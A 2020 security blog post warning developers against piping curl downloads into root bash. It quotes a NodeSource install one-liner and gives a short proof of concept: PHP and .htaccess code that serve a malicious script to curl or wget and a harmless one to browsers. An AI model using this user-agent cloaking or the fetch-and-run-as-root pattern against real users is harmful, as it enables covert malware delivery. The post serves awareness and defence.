Careless With Curl? Don't Be

BY Tom Lindley / ON Feb 14, 2020

What is curl?


cURL (“Client URL”) is a command line tool for transferring data over a network/ the Internet. It’s widely used for scripting and development, where a download of a remote file/package/resource is required.

It’s useful because it bypasses the need to crack open a browser, go to the download page, download the resource, move it to a different directory and so on. This can all be achieved in a single command.

Most developers blindly trust cURL and the target resource, running cURL scripts which download and execute files to their hearts content, while listening to hardcore electronica on giant headphones.

Here our developer Tom talks about why this is a terrible idea (the cURL carelessness, not the music), and demonstrates a quick n’ dirty PoC for pwning careless cURL users!

How to be careless with cURL


Imagine you want to install a specific version of Node.js, you can go to (https://github.com/nodesource/distributions/blob/master/README.md) to find the URL for that specific version.

You then run curl -sL https://deb.nodesource.com/setup_13.x | sudo -E bash - to install version 13.

Because you’re a sensible person you open up the link in your browser to read it to make sure you’re not running root bash on something that is malicious. Right?

Lets do something nasty

Now, let’s imagine a 2 line PHP file that looks something like this:

<?php
header('Content-Type: text/plain');
echo preg_match('/(wget|curl)/i',$_SERVER['HTTP_USER_AGENT']) ? file_get_contents('malicious.sh') : file_get_contents('safe.sh');

We return a nice text/plain header so no one suspects a thing! We look for curl or wget (a similar command line utility) in the User-Agent header and return malicious.sh. If we don’t see it then we can return our lovely safe.sh.

Let’s do some more disguising with .htaccess.

RewriteEngine on
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule ^(.*)$ script.php?url=$1 [QSA,L]

Now we can navigate to http://mywebsite.com/install_something.txt and it will run our PHP script which will only return something nasty when it’s downloaded using a command line utility.

Thoughts on this proof of concept

The potential use of this is quite a scary thought and would likely catch out a large number of security conscious individuals. I’ve seen this pattern of installing things via scripts more and more in recent years.

There’s lots of security issues related to the User-Agent from targeting vulnerable browsers to header injection. I’ve not however, seen anything related to this simple example. This is not to say that this is not happening in the wild, so make sure you curl your scripts instead of looking at them in a browser!

Share: